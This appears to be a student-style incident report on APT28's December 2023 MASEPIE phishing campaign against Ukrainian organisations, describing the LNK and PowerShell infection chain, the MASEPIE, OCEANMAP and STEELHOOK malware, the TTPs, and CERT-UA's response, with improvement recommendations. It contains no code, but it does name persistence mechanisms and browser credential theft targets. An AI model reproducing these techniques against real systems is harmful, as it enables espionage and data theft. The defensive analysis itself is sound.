Analysis of a Recent Cybersecurity

Incident

Title:

Russian Military Hackers Target Ukraine with MASEPIE Malware

Introduction:

 It is a recent cybersecurity incident involving Russian state-sponsored threat actors

targeting Ukraine with a new malware strain named 'MASEPIE.'
 The incident, which occurred between December 15 and 25, 2023, underscores the urgency
of understanding and evaluating the incident response plan implemented by Ukraine's
Computer Emergency Response Team (CERT-UA).
 During December 15-25, 2023, several cases of distribution of e-mails with links to
"documents" were discovered among government organizations, visiting which led to the
damage of computers with malicious programs.

Incident Overview:

 The threat actors, identified as APT28 or Fancy Bear, employed a phishing campaign to
deliver the MASEPIE malware.
 The campaign targeted government entities, businesses, universities, research institutes,
and think tanks in Ukraine.
 The phishing emails, urging recipients to click on a seemingly important document link,
redirected victims to malicious web resources.
 These resources utilized JavaScript to deploy a Windows shortcut file (LNK), triggering
PowerShell commands that initiated the infection chain for the 'MASEPIE' malware.
Investigating the incident:

 In the process of investigating the incidents, it was found that the mentioned links
redirect the victim to a web resource where, with the help of JavaScript and features of
the application protocol "search" ("ms-search") [1], a shortcut file is downloaded, the
opening of which leads to the launch A PowerShell command designed to download
from a remote (SMB) resource and run (open) a decoy document, as well as the Python
programming language interpreter and the Client.py file classified as MASEPIE.
 Using MASEPIE, OPENSSH (for building a tunnel), STEELHOOK PowerShell scripts
(stealing data from Chrome/Edge Internet browsers), and the OCEANMAP backdoor are
loaded and launched on the computer.
 In addition, IMPACKET, SMBEXEC, etc. are created on the computer within an hour from
the moment of the initial compromise, with the help of which network reconnaissance
and attempts at further horizontal movement are carried out.
 At the same time, it is obvious that the malicious plan also involves taking measures to
develop a cyberattack on the entire information and communication system of the
organization.
 Thus, the compromise of any computer can pose a threat to the entire network.
For reference:

 OCEANMAP

 It is a malicious program developed using the C# programming language.

 The main functionality consists in executing commands using cmd.exe.
 The IMAP protocol is used as a control channel.
 Commands, in base64-encoded form, are contained in message drafts ("Drafts") of
the corresponding directories of electronic mailboxes; each of the drafts contains
the name of the computer, the name of the user and the version of the OS.
 The results of executing commands are stored in the directory of incoming messages
("INBOX").
 Implemented a configuration update mechanism (command check interval,
addresses and authentication data of mail accounts), which involves patching the
backdoor executable and restarting the process.
 Persistence is ensured by creating a .URL file 'VMSearch.url' in the autorun directory.

 MASEPIE

 It is a malicious program developed using the Python programming language.

 The main functionality consists in uploading/unloading files and executing
commands.
 The TCP protocol is used as a control channel.
 Data is encrypted using the AES-128-CBC algorithm; the key, which is a sequence of
16 arbitrary bytes, is generated at the beginning of the connection establishment.
  Backdoor persistence is ensured by creating the 'SysUpdate' key in the 'Run' branch
of the OS registry, as well as by using the LNK file 'SystemUpdate.lnk' in the startup
directory.

 STEELHOOK

 It is a PowerShell script that provides the theft of Internet browser data ("Login
Data", "Local State") and the DPAPI master key by sending them to the
management server using an HTTP POST request in base64-encoded form.

Tactics, Techniques, and Procedures (TTPs) used:

Tactics:
Phishing: The primary delivery method involved sending phishing emails with malicious
attachments disguised as legitimate documents.
Techniques:

1- Malware: The emails carried a novel malware strain called Masepie, written in Python,
capable of:
 Uploading files.
 Executing commands.
 Deploying additional malware:

 Steelhook: A web browser data-stealing malware.

 Oceanmap: A backdoor leveraging email software.

2- Open-source tools: After initial compromise, attackers used readily available tools like
Impacket and Smbexec for:

 Reconnaissance.
 Network exploitation.
Sub-techniques:

 Social engineering: Phishing emails likely used tailored content and sender names to
appear trustworthy and entice victims to open attachments.
 Obfuscation: Masepie malware reportedly employed techniques to evade detection by
security software.
  Persistence: The attackers utilized Masepie to establish remote access, allowing them to
maintain long-term control over compromised systems.

These TTPs demonstrate a multi-layered approach by APT28:

 Initial compromise: Lure victims into downloading and opening malware through
phishing.
 Lateral movement: Use Masepie to upload additional malware and tools for deeper
network infiltration.
 Data exfiltration: Steal sensitive information using tools like Steelhook.
 Command and control: Establish persistent access with Oceanmap for ongoing control
and potential future operations.

Incident Response Plan/Strategy:

 CERT-UA responded to the incident by identifying the malware's characteristics and

behavior.
 MASEPIE, upon infection, modified the Windows Registry and added a deceptive LNK
file to the Windows Startup folder, ensuring persistence on the infected device.
 The malware's primary objectives were to download additional malware and steal data.

Breakdown of Incident Response Plan:

1. Preparation: CERT-UA demonstrated preparedness in identifying and responding to the

incident swiftly.
2. Detection: The detection phase involved recognizing the phishing campaign, malware
characteristics, and its propagation mechanisms.
3. Containment: Measures were taken to isolate and prevent the lateral movement of the
malware within the network.
4. Eradication: CERT-UA focused on removing the malware and its artifacts, including
modifications to the Registry and Startup folder.
5. Recovery: Efforts were made to restore affected systems and enhance security
measures to prevent future incidents.
6. Lessons Learned: An analysis of the incident provided insights for improving future
incident response strategies.
Comparison with Best Practices:

 Research identified incident response best practices from frameworks such as NIST and
ISO/IEC 27035.
 While CERT-UA demonstrated promptness, there are areas where alignment with best
practices can be enhanced, particularly in proactive measures for preventing initial
compromises.

Recommendations for Improvement:

1. Strengthen proactive measures to prevent phishing attacks, possibly through user education
and advanced email filtering.
2. Enhance detection capabilities, including the use of threat intelligence feeds.

3. Improve containment strategies to mitigate lateral movement swiftly.

4. Enhance recovery processes for quicker system restoration.

5. Conduct regular simulations and exercises to refine incident response procedures.

Conclusion:
 The incident underscores the importance of a robust incident response plan.
 While CERT-UA exhibited effectiveness, continuous refinement is crucial to stay ahead of evolving
threats.
 The proposed recommendations aim to fortify Ukraine's cybersecurity posture against sophisticated
threat actors.

References:
https://www.bleepingcomputer.com/news/security/russian-military-hackers-target-ukraine-
with-new-masepie-malware/
https://www.broadcom.com/support/security-center/protection-bulletin/apt28-group-
targets-ukraine-with-new-masepie-malware
https://cert.gov.ua/article/6276894